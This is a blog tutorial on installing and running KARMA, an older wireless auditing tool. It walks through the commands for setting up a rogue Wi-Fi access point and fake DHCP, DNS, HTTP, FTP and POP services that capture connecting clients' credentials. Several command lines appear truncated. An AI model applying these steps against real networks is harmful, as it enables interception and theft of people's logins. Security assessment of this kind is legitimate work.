How To Hack: Using KARMA to Capture Clients as a Rogue Wifi Hotspot

25qtaj7“KARMA is a set of tools for assessing the security of wireless clients at multiple layers. Wireless sniffing tools discover clients and their preferred/trusted networks by passively listening for 802.11 Probe Request frames. From there, individual clients can be targeted by creating a Rogue AP for one of their probed networks (which they may join automatically) or using a custom driver that responds to probes and association requests for any SSID.  Higher-level fake services can then capture credentials or exploit client-side vulnerabilities on the host.” -

Download latest stable code from:

We will cover the following:

  • Installing KARMA
  • Using KARMA (discovery)
  • Using KARMA (Rogue Services)

Installing KARMA: (the number following karma may be different)

tar zxvf karma-20060124.tar.gz

cd karma-20060124

cp  src/misc/madwifi.patch  /root

cd /root

patch -p0  <  madwifi.patch

ln -s  /sbin/iwconfig  /usr/sbin/iwconfig

ln -s  /sbin/iwpriv  /usr/sbin/iwpriv

ln -s  /sbin/iwevent  /usr/sbin/iwevent

yum install ruby

(answer “y” when prompted).

Using KARMA (discovery):

cd /tools/wifi/karma-20060124

bin/ ath0

(cd ./src/ && make) && ./src/karma ath0

“This display will list wireless clients in range and the networks they send probe requests for.  This reveals the entries in their preferred networks list.” -

KARMA runs in stealth mode so basic wireless scanning activity (e.g. Netstumbler) will not detect the servers presence.

Using KARMA (Rogue Services):

KARMA also provides a number of other configurations stored in karma-20060124/etc



karma-scan.xml“Attempts to find insecure wireless clients that will associate to rogue network and possibly obtain IP address via DHCP”. -


cd /tools/wifi/karma-20060124

bin/  ath0

bin/karma  etc/karma-scan.xml

Now the rogue services are started any probing clients will now connect to KARMA on our machine whichever SSID their machine chooses to use.

Above we can see the client received the IP address from KARMA’s DHCP server.



karma.xml “Runs a rogue base station with DHCP, DNS and HTTP services.  The HTTP service re-directs all requests to the ExampleWebExploit module that displays a simple HTML page.  This page can be replaced with something that informs the user that their wireless settings are insecure and that it may be a violation of corporate policy etc” -


cd /tools/wifi/karma-20060124

bin/  ath0

bin/karma  etc/karma.xml

KARMA is now offering a variety of services (POP, FTP and HTTP) for any curious user to connect up to.

Above we can see an attempted FTP connection to which actually was received by KARMA and the users credentials – username = myusername and password = mypassword were capture by KARMA.



karma-lan.xml“This configuration runs a  rogue DHCP, DNS and HTTP services on an existing (wired) network connection.  The HTTP service redirects all requests to ExampleWebExploit module that displays simple HTML page” -


cd /tools/wifi/karma-20060124

bin/  ath0

bin/karma  etc/karma-lan.xml

The karma-lan.xml configuration file provides you with all the features (e.g. to capture POP, FTP and HTTP traffic) of karma.xml but for a wired interface.

Tagged , , , , , , , , , , , , , , , , , , . Bookmark the permalink.

Leave a Reply

Your email address will not be published. Required fields are marked *